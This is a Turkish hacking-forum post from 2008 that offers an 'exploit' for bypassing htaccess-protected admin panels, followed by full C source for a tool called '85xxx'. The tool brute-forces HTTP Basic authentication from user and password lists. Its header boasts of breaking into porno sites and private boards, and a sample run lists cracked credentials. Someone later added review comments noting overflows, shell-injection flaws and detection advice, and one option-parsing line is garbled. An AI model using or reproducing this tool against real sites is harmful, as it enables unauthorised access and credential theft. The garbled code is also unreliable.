
 

 Htaccess Şifre Kırıcı

hacked
MASTER
MASTER
hacked


Mesaj Sayısı : 199
Kayıt tarihi : 08/03/08

Konu: Htaccess Şifre Kırıcı — Salı Mart 11, 2008 12:14 am

Evet, son zamanlarda birçok zeki webmaster admin panellerine vs. htaccess ile şifre koyuyor; doğal olarak buralara erişemiyoruz. Birazdan vereceğim exploit, brute force yöntemiyle bu engeli aşmak için çalışıyor. Exploiti cygwin veya blind shell sayesinde herhangi bir serverda derleyebilirsiniz. Exploit kodları:

kod:::

/*
\ 85xxx v1.0 by xCrZx ///////////////////////////////////////////23.01.04/
/
\ [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
/ []
\ Description: Program allows you to break htaccess using brute force []
/ mode. This is very convenient to breake into porno sites []
\ or some other private area such as board, etc. []
/ []
\ [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
*/

/*
\ example of work:
/
\ -bash-2.05b$ ./85xxx -h chat.eprst.ru -po 80 -pa /enter.php3 -u luser -p lpass -s
/ TARGET: chat.eprst.ru:80/enter.php3
\ 200 OK FOUND -> http://pisyun:qwerty@chat.eprst.ru:80/enter.php3
/ [pisyun]
\ 200 OK FOUND -> http://pisyaisyun@chat.eprst.ru:80/enter.php3
/ [pisya]
\ [qwerty]
/ [monster]
\ [sosok]
/ [siska]
\ [porno]
/ -bash-2.05b$
\
*/


#include <sys/param.h>
#include <stdio.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>

/* Results file; check() and main() append to it by running shell commands. */
#define lfn "./.logfile"

int port; /* set to 80 in main(), then overwritten by the -po option */
int v=0; /* verbose flag (-v) */
int s=0; /* show-results flag (-s) */
int own=0; /* set by -404: enables the own404 substring filter in check() */
char *victim; /* host name or address from -h */
char *page; /* request path, used as the first field of fmt */
char *own404; /* first the -404 file name, then the text loaded by getown404() */

/*
 * Request template filled in by check() with the path, the Host value and
 * the base64 credential. Host and Authorization are the only headers, so
 * every attempt reaches the server as a GET carrying Basic credentials and
 * no User-Agent header.
 */
char fmt[] =


"GET %s HTTP/1.1\r\n"
"Host: %s\r\n"
"Authorization: Basic %s\r\n\r\n"



;


/* Lookup table that base64Encode() indexes with 6-bit values. */
static char table64[]=
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvw xyz0123456789+/";

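/*
 * Print a fatal error message on stdout and terminate with exit status -1.
 *
 * str is written verbatim. The original handed it to printf() as the format
 * string, so a '%' inside the message would have been parsed as a conversion
 * specifier; fputs() performs no such interpretation.
 */
void errmsg(char *str) {

    fputs(str, stdout);
    fflush(stdout);

    exit(-1);

}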

/*
 * Return the IPv4 address for the global `victim`; check() stores the value
 * in sockaddr_in.sin_addr.s_addr.
 *
 * The string is first passed to inet_addr(). Only when that result compares
 * below zero is the name resolved with gethostbyname(); a failed lookup
 * prints the error with perror() and exits with status -1.
 *
 * NOTE(review): inet_addr() reports failure with an unsigned all-ones value,
 * so whether the `< 0` test can ever be true depends on the width of long on
 * the build target — confirm.
 */
long getip() {
struct hostent *he;
long ipaddr;

if ((ipaddr = inet_addr(victim)) < 0) {
if ((he = gethostbyname(victim)) == NULL) {
perror("gethostbyname()");
exit(-1);
}
/* copies h_length bytes over ipaddr; assumes h_length <= sizeof ipaddr — TODO confirm */
memcpy(&ipaddr, he->h_addr, he->h_length);
}
return ipaddr;
}

/*
 * Encode the NUL-terminated string `intext` into `output` using table64.
 *
 * Input is consumed in groups of up to three bytes; every group yields four
 * output characters, with '=' filling the positions a short final group
 * cannot supply. `output` is always NUL-terminated on return.
 *
 * Nothing here bounds the write: the caller must provide at least
 * 4 * ((strlen(intext) + 2) / 3) + 1 bytes.
 */
void base64Encode(char *intext, char *output)
{
    unsigned char grp[3];
    int taken;
    int k;

    while (*intext) {
        /* Gather up to three input bytes, zero-filling what is missing. */
        taken = 0;
        for (k = 0; k < 3; k++) {
            if (*intext) {
                grp[k] = *intext++;
                taken++;
            } else {
                grp[k] = 0;
            }
        }

        /* The first two characters exist for every group size. */
        output[0] = table64[grp[0] >> 2];
        output[1] = table64[((grp[0] & 0x03) << 4) | (grp[1] >> 4)];

        /* Third and fourth characters are padding when the group is short. */
        if (taken == 1) {
            output[2] = '=';
        } else {
            output[2] = table64[((grp[1] & 0x0F) << 2) | (grp[2] >> 6)];
        }
        if (taken == 1 || taken == 2) {
            output[3] = '=';
        } else {
            output[3] = table64[grp[2] & 0x3F];
        }

        output += 4;
    }
    *output = 0;
}


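/*
 * Return the size in bytes of the file named `fn`.
 *
 * Returns -1 when the file cannot be opened or its end cannot be located.
 * The original passed an unchecked fopen() result straight to fseek(), which
 * dereferences a null stream when the file is missing or unreadable.
 */
long fz(char *fn) {

    FILE *fp = fopen(fn, "r");
    long sz = -1;

    if (fp == NULL)
        return -1;

    /* ftell() itself yields -1 on failure, matching the error value above. */
    if (fseek(fp, 0, SEEK_END) == 0)
        sz = ftell(fp);
    fclose(fp);

    return sz;
}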

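/*
 * Load the -404 filter text from the file `fn` into the global own404,
 * dropping every CR and LF byte. Exits through errmsg() on failure.
 *
 * Differences from the original, all memory-safety related:
 *  - the buffer has room for a terminating NUL and is terminated, because
 *    own404 is later used with "%s" and strstr();
 *  - the allocation result is checked;
 *  - the copy never writes more bytes than were allocated, even if the file
 *    grows between the size query and the read;
 *  - a read() error (-1) ends the loop instead of being treated as data;
 *  - the descriptor is closed.
 *
 * `fn` may alias own404 (main() passes own404 itself), so own404 is only
 * reassigned after the last use of fn.
 */
void getown404(char *fn) {

    int fd;
    char c;
    long sz;
    long i = 0;
    char *buf;

    if ((fd = open(fn, O_RDONLY)) < 0) errmsg("Can't open -404 filename!\n");

    sz = fz(fn);
    if (sz < 0) {
        close(fd);
        errmsg("Can't open -404 filename!\n");
    }

    buf = (char *)malloc((size_t)sz + 1);
    if (buf == NULL) {
        close(fd);
        errmsg("Can't allocate memory for -404 filename!\n");
    }

    while (i < sz && read(fd, &c, sizeof c) > 0) {
        if (c != '\n' && c != '\r') buf[i++] = c;
    }
    buf[i] = '\0';
    close(fd);

    own404 = buf;

    if (v) printf("own404 = '%s'\n", own404);

}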

/*
 * Send one GET request carrying the HTTP Basic credential u:p and report the
 * pair when the reply contains the text "200 OK".
 *
 * Every call opens its own TCP connection, resolves the host again through
 * getip() and sends the fmt template. A reported pair is printed when s or v
 * is set and appended to lfn by running an echo command through system().
 *
 * Review notes (defects in this routine as written):
 *  - c, rez and tmp are filled with unbounded sprintf() calls. rez has the
 *    same size as c although base64 output is about a third longer than its
 *    input, so long list entries overflow the stack buffers.
 *  - u and p are pasted into a shell command line; list content containing
 *    shell metacharacters is interpreted by the shell on the operator's host.
 *  - read() may fill tmp completely, leaving no NUL terminator for the
 *    strlen()/strstr()/printf() calls that follow.
 *  - the return values of socket(), write() and read() are not checked.
 *
 * Defender's view: each guess is a separate connection whose request holds
 * only Host and Authorization headers, so a run of this code presumably
 * shows up in access logs as a burst of authentication failures for a single
 * path from one client; rate limiting or lockout on repeated failures and
 * alerting on that pattern address it.
 */
void check(char *u, char *p) {
struct sockaddr_in sockstruct;
struct hostent *HOST;
char tmp[10000];
int sock;
int num;
fd_set rset;
/* This local port shadows the file-scope port, so 80 is always used here.
   HOST, num, rset and shellport are not used in this function. */
int port=80,shellport=17476;
char c[2000];
char rez[2000];

/* "user:password" is the payload that Basic authentication base64-encodes. */
sprintf(c,"%s:%s",u,p);

base64Encode(c,rez);

sock=socket(PF_INET,SOCK_STREAM,0);
sockstruct.sin_family=PF_INET;
sockstruct.sin_addr.s_addr=getip();
sockstruct.sin_port=htons(port);

if(v) printf("\n[!] Connecting to %s:%d\n",victim,port);

if(connect(sock,(struct sockaddr*)&sockstruct,sizeof(sockstruct))>-1) {

if(v) printf("Connected!\n");

fcntl(sock,F_SETFL,O_NONBLOCK);

sprintf(tmp,fmt,page,victim,rez);
write(sock,tmp,strlen(tmp));
fcntl(sock,F_SETFL,O_NONBLOCK);

bzero(tmp,sizeof(tmp));

/* Busy-polls the non-blocking socket until some bytes arrive. The read()
   result is ignored, so a peer that closes without sending data leaves
   this loop spinning forever. Only this first chunk is ever examined. */
while(strlen(tmp)==0){bzero(tmp,sizeof(tmp));read( sock,tmp,sizeof(tmp));}

if(v) printf("recieved data='%s'\n",tmp);

/* Custom filter: a reply containing the own404 text counts as a failure,
   whatever status line it carries. */
if(own) if(strstr(tmp,own404)!=NULL) {
if(v) printf("own404 page has been detected!\n");
close(sock);return;
}

/* Substring match anywhere in the chunk, not a parse of the status line. */
if(strstr(tmp,"200 OK")!=NULL) {
if(s || v) printf("200 OK FOUND -> http://%s:%s@%s:%d%s\n",u,p,victim,port,page);
/* tmp is reused as the shell command buffer; u and p reach the shell unescaped. */
sprintf(tmp,"echo \"FOUND [ %s:%s ]\" >> %s",u,p,lfn);system(tmp);
}
} else errmsg("Can't connect to server!\n");

close(sock);
}

/*
 * Entry point: parse the options, then walk the user list line by line.
 * Without -l every user name is paired with every line of the password
 * list; with -l the user name itself is used as the password. Each pair is
 * handed to check(). After each user a "[user]" marker is printed (when s or
 * v is set) and appended to lfn.
 *
 * Review notes (defects in this routine as written):
 *  - the option loop reads argv[i+1] without checking that it exists, and
 *    ul, pl, victim and page stay unset when their option is absent;
 *  - strcmp() results are compared with NULL rather than with 0;
 *  - user[i++] and pass[j++] have no bound, so a list line of 1000 bytes or
 *    more overruns the stack buffers;
 *  - ppp is 200 bytes but receives a user name of up to the size of user;
 *  - list content is pasted into system() command lines and is therefore
 *    interpreted by the shell on the operator's host;
 *  - the password list is re-opened for every user and that descriptor is
 *    never closed inside the loop; with -l, fd2 is closed at the end without
 *    ever having been assigned;
 *  - a final list line without a trailing newline is never processed;
 *  - bazic and userpass are never used.
 */
int main(int argc, char **argv) {

int fd,fd2;
char pass[1000];
char user[1000];
char bazic[2000];
char userpass[2000];
int l=0;
int i=0,j=0;

char *ul,*pl;
char ppp[200];
char c;

/* No arguments: print the usage text and leave. */
if(argc==1) {
printf( "\n85xxx v1.0 by xCrZx /23.01.04/\n\nusage: %s -h <host> -po <port> -pa <page> -u <userlist> -p <passlist> [-l] [-s] [-v] [-404 filename]\n-------------------\n"
"-l - login:login attack\n"
"-s - shows the result of the program execution\n"
"-v - verbose mode\n"
"-404 filename - allows you to add your own rule to make it possible to destinct valid and invalid page result (for example: when your account is invalid but server shows some 200 OK page with words \"login or password is invalid\". In this case you should make file with string that you want to filter..for example, \"invalid\")\n\n"
"P.S. result of the program goes in ./.logfile, so u can run it on background without showing result and after work check that file.\n\n"


,argv[0]);

exit(0);}


port=80;

/* Option scan; every value is taken from the argument that follows its flag. */
for(i=0;i<argc;i++) {
if(strcmp(argv[i],"-u")==NULL) {ul=argv[i+1];}
if(strcmp(argv[i],"-p")==NULL) {pl=argv[i+1];}
if(strcmp(argv[i],"-h")==NULL) {victim=argv[i+1];}
if(strcmp(argv[i],"-po")==NULL) {port=atoi(argv[i+1]);}
/* NOTE(review): the next line is garbled as rendered on this page (the
   string literal is not terminated); it is reproduced unchanged. */
if(strcmp(argv[i],"-p**uot==NULL) {page=argv[i+1];}
if(strcmp(argv[i],"-l")==NULL) {l=1;}
if(strcmp(argv[i],"-s")==NULL) {s=1;}
if(strcmp(argv[i],"-v")==NULL) {v=1;}
/* own404 holds the file name here; getown404() replaces it with the file's text. */
if(strcmp(argv[i],"-404")==NULL) {own=1;own404=argv[i+1];}
}


if(own) getown404(own404);

if(s || v) printf("TARGET: %s:%d%s\n",victim,port,page);

if( (fd=open(ul,O_RDONLY)) < 0 ) errmsg("Can't open userlist!\n");

memset(user,0x00,sizeof user);
i=0;

/* user doubles as a scratch buffer: reset the log file through the shell. */
sprintf(user,"echo>%s",lfn);
system(user);
bzero(user,sizeof user);

/* Read the user list one byte at a time; CR or LF ends the current entry. */
while(read(fd,&c,sizeof c)) {
if(c!='\n' && c!='\r') user[i++]=c;
else {

if(!l) {

/* Full pass over the password list for this user. */
j=0;
bzero(pass,sizeof pass);
if( (fd2=open(pl,O_RDONLY)) < 0) errmsg("Can't open passlist!\n");
while(read(fd2,&c,sizeof c)) {
if(c!='\n' && c!='\r') pass[j++]=c;
else {
/* Empty lines are skipped. */
if(strlen(pass)!=0) {
if(v) printf("user=%s pass=%s\n",user,pass);
check(user,pass);
j=0; bzero(pass,sizeof pass);
}}
}

}
/* -l mode: try the user name as its own password. */
else { strcpy(pass,user); check(user,pass);}
if(s || v) printf("[%s]\n",user);
/* Progress marker in the log; user reaches the shell unescaped. */
sprintf(ppp,"echo \"[%s]\" >> %s",user,lfn);
system(ppp);

i=0; bzero(user,sizeof user);
}
}

close(fd);close(fd2);

/* own404 is the buffer from getown404() when -404 was given; otherwise it is
   the untouched file-scope pointer. */
free(own404);

return 0;
}